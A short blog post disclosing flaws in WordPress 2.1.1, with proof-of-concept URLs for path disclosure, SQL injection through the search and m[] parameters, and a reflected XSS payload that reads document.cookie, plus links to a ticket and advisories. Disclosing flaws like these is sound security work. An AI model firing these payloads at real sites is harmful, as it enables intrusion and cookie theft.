SQL Injection in WordPress 2.1.1

iconUpgrading to wordpress 2.1.1 was urgent, but we still have SQL injections, path disclosures and cross site scripting problems in this version! My colleague Sebastian Krause has some examples:

a) Path disclosure (should be fixed in 2.0.2?):

http://BLOGURL/wp-settings.php

b) SQL injections in search form. Put a “,” or “+” or ” ” in the search box or use this URL (this is new in 2.1.1):

http://BLOGURL/index.php?s=%2C

c) XSS 🙁 :

http://BLOGURL/index.php?s='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

d) SQL injection in ‘where’ clause (should be fixed earlier?):

http://BLOGURL/index.php?m[]'

There is a ticket with just one bug open http://trac.wordpress.org/ticket/3722 based on the original post

Update:

there are even more vulns in wp-admin.php: http://www.fadetoblack.ch/advisories/
wordpress_2.1.1_multiple_script_injection_vulnerabilities.txt

and some AdminPanel CSRF/XSS issues: http://seclists.org/bugtraq/2007/Feb/0494.html

2 thoughts on “SQL Injection in WordPress 2.1.1”

  1. Pingback: geschonneck.com
  2. Pingback: The Tryary WS

Comments are closed.